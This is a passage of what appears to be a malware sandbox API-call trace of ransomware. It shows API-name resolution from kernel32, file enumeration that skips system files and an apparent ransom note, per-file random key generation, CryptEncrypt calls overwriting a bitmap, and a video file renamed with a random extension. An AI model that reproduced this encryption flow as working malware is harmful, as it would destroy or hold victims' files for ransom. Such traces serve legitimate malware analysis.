(lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0083.293] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0083.293] lstrlenA (lpString="DEBUGBREAK") returned 10 [0083.293] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0083.294] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0083.294] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0083.294] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0083.294] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0083.294] lstrlenA (lpString="DECODEPOINTER") returned 13 [0083.294] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0083.294] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0083.294] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0083.294] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0083.294] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0083.294] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0083.294] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0083.294] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0083.294] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0083.294] lstrlenA (lpString="DELETEATOM") returned 10 [0083.294] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0083.294] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0083.294] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0083.294] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0083.294] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0083.294] lstrlenA (lpString="DELETEFIBER") returned 11 [0083.294] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0083.294] lstrlenA (lpString="DELETEFILEA") returned 11 [0083.294] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0083.294] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0083.294] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0083.294] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0083.294] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0083.294] lstrlenA (lpString="DELETEFILEW") returned 11 [0083.294] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0083.294] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0083.294] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0083.294] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0083.294] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0083.294] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0083.294] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0083.294] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0083.295] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0083.295] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0083.295] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0083.295] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0083.295] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0083.295] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0083.295] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0083.295] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0083.295] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0083.295] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0083.295] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0083.295] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0083.295] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0083.295] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0083.295] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0083.295] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0083.295] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0083.295] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0083.295] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0083.295] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0083.295] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0083.295] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0083.295] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0083.295] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0083.295] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0083.295] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0083.295] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0083.295] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0083.295] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0083.295] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0083.295] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0083.295] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0083.295] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0083.295] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0083.295] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0083.295] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0083.296] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0083.296] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0083.296] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0083.296] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0083.296] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0083.296] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0083.296] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0083.296] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0083.296] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0083.296] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0083.296] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0083.296] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0083.296] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0083.296] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0083.296] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0083.296] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0083.296] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0083.296] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0083.296] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0083.296] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0083.296] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0083.296] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0083.296] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0083.296] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0083.296] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\Sy-Ep.mkv") returned 84 [0083.296] wsprintfW (in: param_1=0x3f2d9ac, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\Sy-Ep.mkv.b8sT") returned 89 [0083.296] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\Sy-Ep.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ggflb 9aa\\szbevm7vdk3shvh\\wmoo1ftknq\\sy-ep.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\Sy-Ep.mkv.b8sT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ggflb 9aa\\szbevm7vdk3shvh\\wmoo1ftknq\\sy-ep.mkv.b8st"), dwFlags=0x0) returned 1 [0083.297] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.297] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.297] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.298] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x419c4550, ftCreationTime.dwHighDateTime=0x1d4c546, ftLastAccessTime.dwLowDateTime=0x90cd45d0, ftLastAccessTime.dwHighDateTime=0x1d4c667, ftLastWriteTime.dwLowDateTime=0x90cd45d0, ftLastWriteTime.dwHighDateTime=0x1d4c667, nFileSizeHigh=0x0, nFileSizeLow=0xaae5, dwReserved0=0x0, dwReserved1=0x0, cFileName="Sy-Ep.mkv", cAlternateFileName="")) returned 0 [0083.298] FindClose (in: hFindFile=0x5f8cd8 | out: hFindFile=0x5f8cd8) returned 1 [0083.298] CloseHandle (hObject=0x448) returned 1 [0083.298] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78bc85a0, ftCreationTime.dwHighDateTime=0x1d4cfb8, ftLastAccessTime.dwLowDateTime=0xb053a7a0, ftLastAccessTime.dwHighDateTime=0x1d4d51c, ftLastWriteTime.dwLowDateTime=0xb053a7a0, ftLastWriteTime.dwHighDateTime=0x1d4d51c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="wMOo1ftKNq\\", cAlternateFileName="WMOO1F~1")) returned 0 [0083.298] FindClose (in: hFindFile=0x5f8c98 | out: hFindFile=0x5f8c98) returned 1 [0083.298] CloseHandle (hObject=0x440) returned 1 [0083.298] FindNextFileW (in: hFindFile=0x5f8c58, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac2c2fc0, ftCreationTime.dwHighDateTime=0x1d4d013, ftLastAccessTime.dwLowDateTime=0x917915f0, ftLastAccessTime.dwHighDateTime=0x1d4d33b, ftLastWriteTime.dwLowDateTime=0x917915f0, ftLastWriteTime.dwHighDateTime=0x1d4d33b, nFileSizeHigh=0x0, nFileSizeLow=0x8e66, dwReserved0=0x0, dwReserved1=0x0, cFileName="t48Y4Dl5EdImeGV6QG10.bmp", cAlternateFileName="T48Y4D~1.BMP")) returned 1 [0083.298] lstrcmpiW (lpString1="t48Y4Dl5EdImeGV6QG10.bmp", lpString2="DECRYPT-FILES.txt") returned 1 [0083.298] lstrcmpiW (lpString1="t48Y4Dl5EdImeGV6QG10.bmp", lpString2="autorun.inf") returned 1 [0083.298] lstrcmpiW (lpString1="t48Y4Dl5EdImeGV6QG10.bmp", lpString2="boot.ini") returned 1 [0083.298] lstrcmpiW (lpString1="t48Y4Dl5EdImeGV6QG10.bmp", lpString2="desktop.ini") returned 1 [0083.298] lstrcmpiW (lpString1="t48Y4Dl5EdImeGV6QG10.bmp", lpString2="ntuser.dat") returned 1 [0083.298] lstrcmpiW (lpString1="t48Y4Dl5EdImeGV6QG10.bmp", lpString2="iconcache.db") returned 1 [0083.298] lstrcmpiW (lpString1="t48Y4Dl5EdImeGV6QG10.bmp", lpString2="bootsect.bak") returned 1 [0083.298] lstrcmpiW (lpString1="t48Y4Dl5EdImeGV6QG10.bmp", lpString2="ntuser.dat.log") returned 1 [0083.298] lstrcmpiW (lpString1="t48Y4Dl5EdImeGV6QG10.bmp", lpString2="thumbs.db") returned -1 [0083.298] lstrcmpiW (lpString1="t48Y4Dl5EdImeGV6QG10.bmp", lpString2="Bootfont.bin") returned 1 [0083.298] lstrlenW (lpString="t48Y4Dl5EdImeGV6QG10.bmp") returned 24 [0083.298] lstrcmpiW (lpString1="bmp", lpString2="lnk") returned -1 [0083.298] lstrcmpiW (lpString1="bmp", lpString2="exe") returned -1 [0083.298] lstrcmpiW (lpString1="bmp", lpString2="sys") returned -1 [0083.298] lstrcmpiW (lpString1="bmp", lpString2="dll") returned -1 [0083.298] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\") returned 48 [0083.298] lstrlenW (lpString="t48Y4Dl5EdImeGV6QG10.bmp") returned 24 [0083.298] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\" [0083.299] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\", lpString2="t48Y4Dl5EdImeGV6QG10.bmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\t48Y4Dl5EdImeGV6QG10.bmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\t48Y4Dl5EdImeGV6QG10.bmp" [0083.299] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0083.299] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\t48Y4Dl5EdImeGV6QG10.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ggflb 9aa\\t48y4dl5edimegv6qg10.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0083.299] GetFileSizeEx (in: hFile=0x440, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=36454) returned 1 [0083.299] CreateFileMappingW (hFile=0x440, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x444 [0083.299] MapViewOfFile (hFileMappingObject=0x444, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0083.299] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0083.299] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0083.299] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0083.300] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0083.300] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0083.301] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.301] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0083.302] CloseHandle (hObject=0x444) returned 1 [0083.302] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.302] WriteFile (in: hFile=0x440, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0083.303] CloseHandle (hObject=0x0) returned 0 [0083.303] CloseHandle (hObject=0x440) returned 1 [0083.303] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.303] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.303] GetTickCount () returned 0x114d4bd [0083.303] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0083.303] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0083.303] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0083.304] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0083.304] lstrlenA (lpString="kernel32.dll") returned 12 [0083.304] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0083.304] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0083.304] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0083.304] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0083.304] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0083.304] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0083.304] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0083.304] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0083.304] lstrlenA (lpString="ADDATOMA") returned 8 [0083.304] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0083.304] lstrlenA (lpString="ADDATOMW") returned 8 [0083.304] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0083.304] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0083.304] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0083.305] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0083.305] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0083.305] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0083.305] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0083.305] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0083.305] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0083.305] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0083.305] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0083.305] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0083.305] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0083.305] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0083.305] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0083.305] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0083.305] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0083.305] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0083.305] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0083.305] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0083.305] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0083.305] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0083.305] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0083.305] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0083.305] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0083.305] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0083.305] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0083.305] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0083.305] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0083.305] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0083.305] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0083.305] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0083.305] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0083.305] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0083.305] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0083.305] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0083.305] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0083.305] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0083.305] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0083.305] lstrlenA (lpString="BACKUPREAD") returned 10 [0083.306] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0083.306] lstrlenA (lpString="BACKUPSEEK") returned 10 [0083.306] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0083.306] lstrlenA (lpString="BACKUPWRITE") returned 11 [0083.306] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0083.306] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0083.306] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0083.306] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0083.306] lstrcpyA (in: lpString1=0x3f2d1ec, 